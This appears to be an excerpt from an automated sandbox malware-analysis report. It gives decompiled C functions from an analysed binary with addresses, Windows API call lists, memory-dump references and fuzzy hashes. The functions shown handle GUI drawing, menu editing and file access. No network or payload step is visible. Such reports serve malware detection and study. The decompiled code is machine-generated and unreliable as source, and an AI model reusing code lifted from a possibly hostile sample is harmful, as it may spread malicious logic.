      Download Yara Rule
      C-Code - Quality: 100%
      			E00448F3C(void* __eax, struct HDC__* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				struct HDC__* _t134;
				int _t135;
				void* _t136;
				void* _t155;
				void* _t156;
				void* _t157;
				struct HDC__* _t158;
				intOrPtr* _t159;

				_t137 = __ecx;
				_t159 =  &(_v44.bottom);
				_t134 = __ecx;
				_t158 = __edx;
				_t157 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *(__eax + 0x17c) != 0) {
					_t137 =  *( *(__eax + 0x17c));
					 *((intOrPtr*)( *( *(__eax + 0x17c)) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t157 + 0x198));
				if( *((intOrPtr*)(_t157 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t157 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t155 = 0;
					do {
						_t79 = E00419C84( *(_t157 + 0x19c), _t137, _t155);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0042566C(0xff000010));
							E00418618( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t158,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0042566C(0xff000014));
							_t137 =  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1;
							E00418618( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t158,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t155 = _t155 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t156 = 0;
				if(_t134 != 0) {
					_t156 = E00419CE8(_t78, _t134);
					if(_t156 < 0) {
						_t156 = 0;
					}
				}
				 *_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x198)) + 8));
				if(_t156 <  *_t159) {
					do {
						_t136 = E00419C84( *((intOrPtr*)(_t157 + 0x198)), _t137, _t156);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							_t137 =  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48);
							E00418618( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t158,  &(_v44.top)) != 0) {
								if(( *(_t157 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t158);
								E00443264(_t158,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t158, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								_t137 = _t158;
								E00445AE8(_t136, _t158, 0xf, 0);
								RestoreDC(_t158, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t156 = _t156 + 1;
					} while (_t156 < _v60.top);
				}
			}
















      0x00448f3c
      0x00448f40
      0x00448f43
      0x00448f45
      0x00448f47
      0x00448f50
      0x00448f6c
      0x00448f6e
      0x00448f6e
      0x00448f71
      0x00448f79
      0x0044905e
      0x0044905e
      0x00449066
      0x0044916b
      0x0044916b
      0x0044916b
      0x0044906f
      0x00449072
      0x00000000
      0x00000000
      0x00449079
      0x0044907d
      0x0044907f
      0x00449087
      0x0044908c
      0x00449095
      0x004490cf
      0x004490f2
      0x004490fd
      0x00449107
      0x0044911c
      0x00449138
      0x0044913f
      0x0044914a
      0x00449154
      0x00449154
      0x00449159
      0x0044915a
      0x0044915a
      0x0044915a
      0x00000000
      0x0044907f
      0x00448f7f
      0x00448f83
      0x00448f8c
      0x00448f90
      0x00448f92
      0x00448f92
      0x00448f90
      0x00448f9d
      0x00448fa3
      0x00448fa9
      0x00448fb6
      0x00448fbc
      0x00448fe1
      0x00448fea
      0x00448ffc
      0x00449002
      0x00449004
      0x00449004
      0x00449010
      0x0044901c
      0x0044902e
      0x00449035
      0x0044903e
      0x00449049
      0x0044904e
      0x0044904e
      0x00448ffc
      0x00449054
      0x00449055
      0x00448fa9

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
      • String ID:
      • API String ID: 375863564-0
      • Opcode ID: c30a44e101534416f7a52dd2c425f69f6a6f73ab6a18ccce055a0954abd5d48f
      • Instruction ID: ae47262fcc0b971a3cd609413da4aab9744b59915cfd7ccfc4be95d1a6c4d586
      • Opcode Fuzzy Hash: c30a44e101534416f7a52dd2c425f69f6a6f73ab6a18ccce055a0954abd5d48f
      • Instruction Fuzzy Hash: 5B517E712042409FEB54EF69C8C4B9B7BD8AF84308F04445EFE898B287DA39EC45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00403080 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
      Download Yara Rule
      C-Code - Quality: 70%
      			E00403080(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402fd4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00403014;
				}
				_t59[9] = E00403060;
				_t59[8] = E00403010;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00403010;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4903e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00403014;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















      0x00403081
      0x00403085
      0x00403088
      0x00403094
      0x004030a1
      0x004030a6
      0x004030ab
      0x004030b0
      0x00403096
      0x00403097
      0x004030b9
      0x004030be
      0x004030c3
      0x00403099
      0x0040309a
      0x00000000
      0x00000000
      0x004030ca
      0x004030cf
      0x004030d4
      0x004030d4
      0x004030d9
      0x004030d9
      0x004030e0
      0x004030e7
      0x004030f2
      0x004031b0
      0x004031b7
      0x004031be
      0x004031c7
      0x004031d3
      0x004031d9
      0x004031d5
      0x004031d5
      0x004031d5
      0x004031c9
      0x004031c9
      0x004031c9
      0x004031db
      0x004031e3
      0x00000000
      0x00000000
      0x004031e5
      0x00000000
      0x004030f8
      0x00403108
      0x00403110
      0x0040321e
      0x0040321e
      0x00000000
      0x00403224
      0x00403116
      0x0040311e
      0x004031e7
      0x004031ed
      0x00403206
      0x00000000
      0x00403206
      0x004031f1
      0x004031f8
      0x0040320c
      0x00403211
      0x00000000
      0x00403217
      0x004031fd
      0x004031ff
      0x004031ff
      0x00000000
      0x004031fd
      0x00403124
      0x00403131
      0x00403132
      0x00000000
      0x00000000
      0x00403138
      0x0040313d
      0x0040313f
      0x0040313f
      0x0040314e
      0x00000000
      0x00403154
      0x00403169
      0x0040316e
      0x00403170
      0x00000000
      0x00000000
      0x00403176
      0x00403178
      0x00403184
      0x00403198
      0x00000000
      0x004031a8
      0x00000000
      0x004031a8
      0x00403198
      0x00403186
      0x00403186
      0x00000000
      0x00403178
      0x0040314e

      APIs
      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00403108
      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040312C
      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00403148
      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00403169
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403192
      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004031A0
      • GetStdHandle.KERNEL32(000000F5), ref: 004031DB
      • GetFileType.KERNEL32(?,000000F5), ref: 004031F1
      • CloseHandle.KERNEL32(?,?,000000F5), ref: 0040320C
      • GetLastError.KERNEL32(000000F5), ref: 00403224
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
      • String ID:
      • API String ID: 1694776339-0
      • Opcode ID: 0d7655cd8fdcd372b9f8c58e5807966ea9927634d7e12d3c984bdbfdb65ce813
      • Instruction ID: 27ff012fa27621f5029f0865dd734609fec62d9dda047afaed24b99b334cb465
      • Opcode Fuzzy Hash: 0d7655cd8fdcd372b9f8c58e5807966ea9927634d7e12d3c984bdbfdb65ce813
      • Instruction Fuzzy Hash: B141F330100700AAF7305F258905B237EECEB44756F208A7FE4A6BA6E5D77EAE45874D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00479AF4 Relevance: 15.1, APIs: 10, Instructions: 104COMMON
      Download Yara Rule
      C-Code - Quality: 62%
      			E00479AF4(intOrPtr* __eax) {
				intOrPtr* _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct HDC__* _t36;
				void* _t72;
				void* _t77;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t88;
				void* _t90;
				void* _t92;
				intOrPtr _t93;

				_t90 = _t92;
				_t93 = _t92 + 0xffffffe8;
				_v8 = __eax;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					return E0044BFB0(_v8, _t82);
				} else {
					_push(0x13);
					_push(0);
					_t36 = E0044B158(_v8);
					_push(_t36);
					L00407660();
					_v12 = _t36;
					_push(_t90);
					_push(0x479beb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t93;
					GetWindowRect(E0044B158(_v8),  &_v28);
					E00406E24( &_v28,  ~(_v28.top),  ~(_v28.left));
					ExcludeClipRect(_v12, _v28.left + 1, _v28.top + 1, _v28.right - 1, _v28.bottom - 1);
					_t77 = CreatePen(1, 1, 0);
					_t88 = SelectObject(_v12, _t77);
					SetBkColor(_v12, E0042566C( *((intOrPtr*)(_v8 + 0x70))));
					Rectangle(_v12, _v28, _v28.top, _v28.right, _v28.bottom);
					if(_t88 != 0) {
						SelectObject(_v12, _t88);
					}
					DeleteObject(_t77);
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x479bfa);
					_push(_v12);
					_t72 = E0044B158(_v8);
					_push(_t72);
					L004078C0();
					return _t72;
				}
			}















      0x00479af5
      0x00479af7
      0x00479afc
      0x00479b06
      0x00479bff
      0x00479b0c
      0x00479b0c
      0x00479b0e
      0x00479b13
      0x00479b18
      0x00479b19
      0x00479b1e
      0x00479b23
      0x00479b24
      0x00479b29
      0x00479b2c
      0x00479b3c
      0x00479b4e
      0x00479b6b
      0x00479b7b
      0x00479b87
      0x00479b99
      0x00479bb2
      0x00479bb9
      0x00479bc0
      0x00479bc0
      0x00479bc6
      0x00479bcd
      0x00479bd0
      0x00479bd3
      0x00479bdb
      0x00479bdf
      0x00479be4
      0x00479be5
      0x00479bea
      0x00479bea

      APIs
      • 73BEACE0.USER32(00000000,00000000,00000013), ref: 00479B19
      • GetWindowRect.USER32 ref: 00479B3C
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,?,00000000,00479BEB,?,00000000,00000000,00000013), ref: 00479B6B
      • CreatePen.GDI32(00000001,00000001,00000000), ref: 00479B76
      • SelectObject.GDI32(?,00000000), ref: 00479B82
        • Part of subcall function 0042566C: GetSysColor.USER32(?), ref: 00425676
      • SetBkColor.GDI32(?,00000000), ref: 00479B99
      • Rectangle.GDI32(?,?,?,?,?), ref: 00479BB2
      • SelectObject.GDI32(?,00000000), ref: 00479BC0
      • DeleteObject.GDI32(00000000), ref: 00479BC6
      • 73BEB380.USER32(00000000,?,00479BFA,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00479BE5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$ColorRectSelect$B380ClipCreateDeleteExcludeRectangleWindow
      • String ID:
      • API String ID: 313503559-0
      • Opcode ID: ba9a215091066343acfeb8d73f99066d8c73f29612c598578114ee2c630a2ad2
      • Instruction ID: 18318c853ddd1ca6afb8db7ef43c3a5b5ecd8978ef1f410e9da75d199ca4b7e8
      • Opcode Fuzzy Hash: ba9a215091066343acfeb8d73f99066d8c73f29612c598578114ee2c630a2ad2
      • Instruction Fuzzy Hash: 7D31E275E04108AFDB50EBE9DC96EDEB7FCEB08704F504466B508F7281D678AE4087A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045FD04 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0045FD04(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0044B158( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





      0x0045fd0b
      0x0045fd15
      0x0045fd1e
      0x0045fd28
      0x0045fd31
      0x0045fd3b
      0x0045fd54
      0x0045fd63
      0x0045fd6d
      0x0045fd7a
      0x0045fd87
      0x0045fd94
      0x0045fda1
      0x0045fdae
      0x00000000
      0x0045fdbb
      0x0045fdcf
      0x0045fdd9
      0x0045fdd9
      0x0045fde1
      0x0045fdeb
      0x00000000
      0x0045fdf5
      0x0045fdeb
      0x0045fd3b
      0x0045fd28
      0x0045fdfc

      APIs
      • GetSystemMenu.USER32(00000000,00000000), ref: 0045FD4F
      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0045FD6D
      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD7A
      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD87
      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD94
      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0045FDA1
      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0045FDAE
      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045FDBB
      • EnableMenuItem.USER32 ref: 0045FDD9
      • EnableMenuItem.USER32 ref: 0045FDF5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$Delete$EnableItem$System
      • String ID:
      • API String ID: 3985193851-0
      • Opcode ID: 97afc092d09705b864c06d5793c85b5a4f4c72f55ac9179b8f4353c0c5274059
      • Instruction ID: f08292b1e9864850543270e70e592a8f622cef3bd0f58cf99fd487d021676499
      • Opcode Fuzzy Hash: 97afc092d09705b864c06d5793c85b5a4f4c72f55ac9179b8f4353c0c5274059
      • Instruction Fuzzy Hash: CF2150707843447AE320A628CC9EF997BD99B1471AF1440B5FA057F6D3C6BCFA88860D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042FA54 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 151COMMON
      Download Yara Rule
      C-Code - Quality: 47%
      			E0042FA54(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char* _t44;
				void* _t69;
				void* _t70;
				void* _t78;
				long _t88;
				intOrPtr _t90;
				void* _t95;
				void* _t97;
				void* _t102;
				intOrPtr _t107;
				intOrPtr _t113;
				intOrPtr* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;
				intOrPtr _t124;

				_t117 = __esi;
				_t115 = __edi;
				_t97 = __ecx;
				_t94 = __ebx;
				_t122 = _t123;
				_t124 = _t123 + 0xfffffbdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t105 = 0;
				_v1064 = 0;
				_v1060 = 0;
				_v1056 = 0;
				_v8 = __eax;
				_push(_t122);
				_push(0x42fc31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				_v12 = 0;
				_v16 = 0;
				_push( &_v16);
				_t44 =  &_v12;
				_push(_t44);
				_push(0);
				_push(0);
				_push(5);
				_push(0);
				_push(1);
				L0042ED00();
				if(_t44 == 0 && GetLastError() != 0x7a) {
					_t88 = GetLastError();
					_t127 = _t88 - 0x7b;
					if(_t88 != 0x7b) {
						E0040E218(__ebx, _t97, __edi, __esi);
					} else {
						_t105 =  &_v1056;
						_t90 =  *0x48f62c; // 0x423d20
						E00406A3C(_t90, _t97,  &_v1056);
						E0042EE58(_v1056);
					}
				}
				_v28 = E00408C10(_v12, _t97, _t105, _t127);
				_push(_t122);
				_push(0x42fbf1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				_push( &_v16);
				_push( &_v12);
				_push(_v12);
				_push(_v28);
				_push(5);
				_push(0);
				_push(1);
				L0042ED00();
				if(_v16 <= 0) {
					GetProfileStringA("windows", "device", 0x42fc40,  &_v1052, 0x3ff);
					_v20 =  &_v1052;
					_v24 = E0042EE08( &_v20);
				} else {
					_v24 =  *_v28;
				}
				_t116 = E0042F804(_v8, _t94, _t115, _t117);
				_t119 =  *((intOrPtr*)( *_t116 + 0x14))() - 1;
				if(_t119 < 0) {
					L13:
					__eflags = 0;
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x42fbf8);
					return E00402AFC(_v28);
				} else {
					_t120 = _t119 + 1;
					_t95 = 0;
					while(1) {
						_push( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x18))() + 8)));
						E00404C38( &_v1060, _v24);
						_pop(_t69);
						_t70 = E00408EE4(_t69, _v1060, 0);
						_t131 = _t70;
						if(_t70 != 0) {
							break;
						}
						_t95 = _t95 + 1;
						_t120 = _t120 - 1;
						__eflags = _t120;
						if(_t120 != 0) {
							continue;
						} else {
							goto L13;
						}
						goto L15;
					}
					_t96 =  *((intOrPtr*)( *_t116 + 0x18))();
					_push(E00404F00( *((intOrPtr*)(_t72 + 0xc))));
					_push(E00404F00( *((intOrPtr*)(_t72 + 4))));
					_t78 = E00404F00( *((intOrPtr*)(_t96 + 8)));
					_pop(_t102);
					E0042F52C(_v8, _t96, _t102, _t78, _t116, _t120, _t131);
					E0040447C();
					_t113 = 0;
					 *[fs:eax] = _t113;
					_push(0x42fc38);
					return E00404A64( &_v1064, 3);
				}
				L15:
			}






























      0x0042fa54
      0x0042fa54
      0x0042fa54
      0x0042fa54
      0x0042fa55
      0x0042fa57
      0x0042fa5d
      0x0042fa5e
      0x0042fa5f
      0x0042fa60
      0x0042fa62
      0x0042fa68
      0x0042fa6e
      0x0042fa74
      0x0042fa79
      0x0042fa7a
      0x0042fa7f
      0x0042fa82
      0x0042fa87
      0x0042fa8c
      0x0042fa92
      0x0042fa93
      0x0042fa96
      0x0042fa97
      0x0042fa99
      0x0042fa9b
      0x0042fa9d
      0x0042fa9f
      0x0042faa1
      0x0042faa8
      0x0042fab4
      0x0042fab9
      0x0042fabc
      0x0042fadb
      0x0042fabe
      0x0042fabe
      0x0042fac4
      0x0042fac9
      0x0042fad4
      0x0042fad4
      0x0042fabc
      0x0042fae8
      0x0042faed
      0x0042faee
      0x0042faf3
      0x0042faf6
      0x0042fafc
      0x0042fb00
      0x0042fb04
      0x0042fb08
      0x0042fb09
      0x0042fb0b
      0x0042fb0d
      0x0042fb0f
      0x0042fb18
      0x0042fb3f
      0x0042fb4a
      0x0042fb55
      0x0042fb1a
      0x0042fb1f
      0x0042fb1f
      0x0042fb60
      0x0042fb6b
      0x0042fb6e
      0x0042fbdb
      0x0042fbdb
      0x0042fbdd
      0x0042fbe0
      0x0042fbe3
      0x0042fbf0
      0x0042fb70
      0x0042fb70
      0x0042fb71
      0x0042fb73
      0x0042fb7f
      0x0042fb89
      0x0042fb94
      0x0042fb95
      0x0042fb9a
      0x0042fb9c
      0x00000000
      0x00000000
      0x0042fbd7
      0x0042fbd8
      0x0042fbd8
      0x0042fbd9
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x0042fbd9
      0x0042fba7
      0x0042fbb1
      0x0042fbbc
      0x0042fbc0
      0x0042fbca
      0x0042fbcb
      0x0042fbd0
      0x0042fc15
      0x0042fc18
      0x0042fc1b
